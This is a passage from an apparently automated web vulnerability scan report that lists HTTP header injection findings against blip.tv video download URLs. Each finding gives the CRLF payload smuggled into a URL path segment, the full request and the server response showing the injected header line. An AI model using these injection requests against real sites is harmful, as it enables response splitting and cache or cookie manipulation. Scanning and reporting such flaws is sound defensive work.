GET /file/b2f74%0d%0af13dc8c7cfe/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/b2f74
f13dc8c7cfe
/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Content-Length: 327
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 1324525916
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/b2f74
f13dc8c7cfe/Armc
...[SNIP]...

2.77. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 608af%0d%0ab546ec733c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/608af%0d%0ab546ec733c HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/608af
b546ec733c

Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 1324526006
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/608af
b546ec733c">
...[SNIP]...

2.78. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 46a60%0d%0a03b1ec9fb4e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /46a60%0d%0a03b1ec9fb4e/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/46a60
03b1ec9fb4e
/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 353
Date: Thu, 20 Jan 2011 00:38:23 GMT
X-Varnish: 1025266264
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/46a60
03b1ec9fb4e/get/Armch
...[SNIP]...

2.79. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ffbc0%0d%0a3d60c17a022 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/ffbc0%0d%0a3d60c17a022/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/ffbc0
3d60c17a022
/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 354
Date: Thu, 20 Jan 2011 00:38:24 GMT
X-Varnish: 344226511
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/ffbc0
3d60c17a022/Armc
...[SNIP]...

2.80. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 51e7d%0d%0a4338ec52283 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/51e7d%0d%0a4338ec52283 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/51e7d
4338ec52283

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:24 GMT
X-Varnish: 1274881279
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/51e7d
4338ec52283"
...[SNIP]...

2.81. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e0840%0d%0a13daeda52ad was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e0840%0d%0a13daeda52ad/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e0840
13daeda52ad
/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:22 GMT
X-Varnish: 1324526714
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e0840
13daeda52ad/get/Armch
...[SNIP]...

2.82. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7ed3d%0d%0a7f56045eacf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/7ed3d%0d%0a7f56045eacf/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/7ed3d
7f56045eacf
/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:22 GMT
X-Varnish: 1025266163
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/7ed3d
7f56045eacf/Armc
...[SNIP]...

2.83. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f728c%0d%0aa0fb5fbeeea was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/f728c%0d%0aa0fb5fbeeea HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/f728c
a0fb5fbeeea

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:23 GMT
X-Varnish: 1025266212
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/f728c
a0fb5fbeeea"
...[SNIP]...

2.84. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cbc6f%0d%0a2a8b44a020e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /cbc6f%0d%0a2a8b44a020e/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/cbc6f
2a8b44a020e
/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 366
Date: Thu, 20 Jan 2011 00:38:18 GMT
X-Varnish: 1025265566
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/cbc6f
2a8b44a020e/get/Armch
...[SNIP]...

2.85. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 721e9%0d%0ab21d787f4c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/721e9%0d%0ab21d787f4c/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/721e9
b21d787f4c
/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 351
Date: Thu, 20 Jan 2011 00:38:18 GMT
X-Varnish: 1324526184
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/721e9
b21d787f4c/Armch
...[SNIP]...

2.86. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3622e%0d%0aa0bd8450bdc was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/3622e%0d%0aa0bd8450bdc HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/3622e
a0bd8450bdc

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:19 GMT
X-Varnish: 1025265669
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/3622e
a0bd8450bdc"
...[SNIP]...

2.87. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 74609%0d%0a1322f15c35b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /74609%0d%0a1322f15c35b/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/74609
1322f15c35b
/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 351
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 1274880713
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/74609
1322f15c35b/get/Armch
...[SNIP]...

2.88. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d4d68%0d%0a1394314c0ea was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/d4d68%0d%0a1394314c0ea/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/d4d68
1394314c0ea
/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 1248904208
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/d4d68
1394314c0ea/Armc
...[SNIP]...

2.89. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 533e1%0d%0a211d4b35ff7 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/533e1%0d%0a211d4b35ff7 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/533e1
211d4b35ff7

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 1498215776
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/533e1
211d4b35ff7"
...[SNIP]...

2.90. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62076%0d%0a4d4800ee83 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62076%0d%0a4d4800ee83/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/62076
4d4800ee83
/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 360
Date: Thu, 20 Jan 2011 00:38:22 GMT
X-Varnish: 2146044932
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/62076
4d4800ee83/get/Armcha
...[SNIP]...

2.91. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9f7c6%0d%0a842cf0637a0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/9f7c6%0d%0a842cf0637a0/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/9f7c6
842cf0637a0
/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 362
Date: Thu, 20 Jan 2011 00:38:22 GMT
X-Varnish: 2146044976
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/9f7c6
842cf0637a0/Armc
...[SNIP]...

2.92. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 4d1fa%0d%0a052bf264571 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/4d1fa%0d%0a052bf264571 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/4d1fa
052bf264571

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:23 GMT
X-Varnish: 1248904636
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/4d1fa
052bf264571"
...[SNIP]...

2.93. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4374a%0d%0a4a21ba9df6e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4374a%0d%0a4a21ba9df6e/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/4374a
4a21ba9df6e
/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 361
Date: Thu, 20 Jan 2011 00:38:21 GMT
X-Varnish: 2146044716
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/4374a
4a21ba9df6e/get/Armch
...[SNIP]...

2.94. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 1fc66%0d%0ad6afc4fff45 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/1fc66%0d%0ad6afc4fff45/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/1fc66
d6afc4fff45
/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Content-Length: 347
Date: Thu, 20 Jan 2011 00:38:21 GMT
X-Varnish: 1498215874
Age: 0
Via: 1.1 varnish
Connection: close

